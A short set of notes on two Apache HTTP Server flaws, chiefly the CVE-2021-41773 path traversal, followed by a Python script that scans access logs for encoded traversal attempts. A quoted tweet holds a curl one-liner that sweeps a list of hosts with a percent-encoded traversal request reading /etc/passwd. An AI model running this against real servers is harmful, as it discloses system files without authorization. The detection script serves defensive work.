CVE-2021-41524 : null pointer dereference in h2 fuzzing (severity)
CVE - CVE-2021-41524
20210920
cve.mitre.org
CVE-2021-41773 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (severity: high)
CVE - CVE-2021-41773
20210929
cve.mitre.org
https://twitter.com/HackerGautam/status/1445412108863041544
Rohit Gautam 🤘🏴☠️ on Twitter
“CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0
twitter.com
I can't believe $host/cgi-bin/../../../../etc/passwd actually works... Apache, what is going on?
Mitigation -> update to Apache 2.4.50
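To check whether a server already received this kind of request, the added example below (not code from the original post or from the Apache project) scans access-log lines for dot segments hidden behind percent-encoding, such as the `.%2e/%2e%2e` sequence quoted above, and reports whether the server answered with content. It assumes Apache's common/combined log format. The function names, verdict labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format (assumed): client, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def escapes_root(decoded_path):
    """Resolve dot segments; True if the path climbs above its starting directory."""
    depth = 0
    for seg in decoded_path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def classify(line):
    """Return (client, verdict) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = m["target"].split("?", 1)[0]
    # A "." or ".." segment written with percent-encoding, e.g. ".%2e" or "%2e%2e".
    # Plain "../" is deliberately not flagged here: this check targets the encoded form.
    encoded_dots = any("%" in s and unquote(s) in (".", "..") for s in raw_path.split("/"))
    if not (encoded_dots and escapes_root(unquote(raw_path))):
        return m["client"], "ok"
    # Status 200 means the server returned content for the traversal path.
    return m["client"], "traversal-served" if m["status"] == "200" else "traversal-attempt"

# Constructed sample lines (documentation IP ranges); the flagged path is the one quoted above.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Oct/2021:10:00:00 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [06/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
    '198.51.100.7 - - [06/Oct/2021:10:00:02 +0000] "GET /docs/../index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Oct/2021:10:00:03 +0000] "GET /files/report%2e2021.pdf HTTP/1.1" 200 2048',
]

def scan(lines):
    """Classify every parsable line and drop the ones that do not match the format."""
    return [r for r in map(classify, lines) if r is not None]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

A `traversal-served` hit means the response for that request should be reviewed as a possible file disclosure; `traversal-attempt` means the request was made but the server refused it.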